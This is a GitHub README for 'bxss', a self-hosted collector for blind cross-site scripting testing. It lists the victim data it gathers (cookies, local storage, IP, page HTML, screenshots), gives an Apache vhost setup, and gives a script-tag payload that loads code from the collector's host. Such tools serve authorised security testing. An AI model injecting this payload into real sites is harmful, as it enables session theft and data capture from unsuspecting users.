bxss

My alternative to XSS Hunter for blind XSS.

Features

reports stored in sqlite database
call logged in log file
reports send on Slack channel (beta)
data collected:
- vulnerable URL
- referer URL
- victim IP
- victim User-Agent
- victim cookies
- victim locale storage
- HTML of the vulnerable page
- screenshot of the vulnerable page

Todo:

reports send by mail

Install

git clone https://github.com/gwen001/bxss

The web user should have write access on the directory images.

Configure domain

Using Apache, you can easily configure a vhost like this:

<IfModule mod_ssl.c>
<VirtualHost *:443>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
	SSLCertificateFile /etc/letsencrypt/live/x.example.com/fullchain.pem
	SSLCertificateKeyFile /etc/letsencrypt/live/x.example.com/privkey.pem
</VirtualHost>
</IfModule>

<VirtualHost *:80>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
</VirtualHost>

Injection

As soon as the script is available online, you can use your favorite XSS payload:

<script src=http://x.example.com></script>

Feel free to open an issue if you have any problem with the script.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

bxss

My alternative to XSS Hunter for blind XSS.

Features

Install

Configure domain

Injection

Files

README.md

Latest commit

History

README.md

File metadata and controls

bxss

My alternative to XSS Hunter for blind XSS.

Features

Install

Configure domain

Injection